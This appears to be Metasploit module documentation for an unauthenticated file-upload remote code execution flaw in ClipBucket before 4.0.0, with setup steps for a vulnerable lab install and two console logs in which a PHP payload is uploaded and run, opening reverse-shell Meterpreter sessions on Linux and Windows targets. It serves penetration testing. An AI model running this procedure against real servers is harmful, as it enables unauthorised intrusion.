## Description

A malicious file can be uploaded by an unauthenticated attacker through the `actions/beats_uploader.php` script.
ClipBucket < 4.0.0 - Release 4902 is vulnerable.  Additional information and vulnerabilities can be viewed on
Exploit-DB [44250](https://www.exploit-db.com/exploits/44250/)

## Vulnerable Application

Available at [Exploit-DB](https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip)

## Vulnerable Application Installation

Download Application: ```wget https://www.exploit-db.com/apps/60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip```

Unzip: ```unzip 60cd1ff56ac93dd35c5e3c4e3537f53c-clipbucket-4881.zip ```

Move In WebDirectory: ```mv clipbucket-4881/upload/* /var/www/html/```

Change Owner: ```chown -R www-data:www-data /var/www/html/```

Follow Clipbucket Installer Instructions at: ```http://localhost/```


## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: `use exploit/multi/http/clipbucket_fileupload_exec`
  4. Do: `set rport <port>`
  5. Do: `set rhost <ip>`
  6. Do: `set lport <port>`
  7. Do: `set lhost <ip>`
  8. Do: `exploit`
  9. You should get a shell.

## Options

  **TARGETURI**

  TARGETURI by default is `/`,  however it can be changed.

## Scenarios

### ClipBucket on Kali Linux

```
msf > use exploit/multi/http/clipbucket_fileupload_exec 
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.4
rhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set targeturi clipbucket
targeturi => clipbucket
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 5050
lport => 5050
msf exploit(multi/http/clipbucket_fileupload_exec) > run 

[*] Started reverse TCP handler on 10.22.1.4:5050 
[*] Uploading payload..
[+] Looking For Payload .... 
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php 
[*] Executing Payload [ clipbucket/actions/CB_BEATS_UPLOAD_DIR/1520842928949a3f.php ]
[*] Sending stage (37543 bytes) to 10.22.1.4
[*] Meterpreter session 1 opened (10.22.1.4:5050 -> 10.22.1.4:41752) at 2018-03-12 13:52:10 +0530
[+] Deleted 1520842928949a3f.php

meterpreter > sysinfo 
Computer    : linux
OS          : Linux linux 4.14.0-kali3-amd64 #1 SMP Debian 4.14.17-1kali1 (2018-02-16) x86_64
Meterpreter : php/linux
meterpreter > 
```
### ClipBucket on Windows 7

```
msf > use exploit/multi/http/clipbucket_fileupload_exec 
msf exploit(multi/http/clipbucket_fileupload_exec) > set rhost 10.22.1.13
rhost => 10.22.1.13
msf exploit(multi/http/clipbucket_fileupload_exec) > set rport 80
rport => 80
msf exploit(multi/http/clipbucket_fileupload_exec) > set TARGETURI clipbucketest
TARGETURI => clipbucketest
msf exploit(multi/http/clipbucket_fileupload_exec) > set lhost 10.22.1.4 
lhost => 10.22.1.4
msf exploit(multi/http/clipbucket_fileupload_exec) > set lport 4545
lport => 4545
msf exploit(multi/http/clipbucket_fileupload_exec) > exploit 

[*] Started reverse TCP handler on 10.22.1.4:4545 
[*] Uploading payload..
[+] Looking For Payload .... 
[+] found payload in /actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php 
[*] Executing Payload [ clipbucketest/actions/CB_BEATS_UPLOAD_DIR/152084407045df09.php ]
[*] Sending stage (37543 bytes) to 10.22.1.13
[*] Meterpreter session 1 opened (10.22.1.4:4545 -> 10.22.1.13:49166) at 2018-03-12 14:11:10 +0530
[+] Deleted 152084407045df09.php

meterpreter > sysinfo 
Computer    : AGENT22-PC
OS          : Windows NT AGENT22-PC 6.1 build 7600 (Windows 7 Ultimate Edition) i586
Meterpreter : php/windows
meterpreter > 
```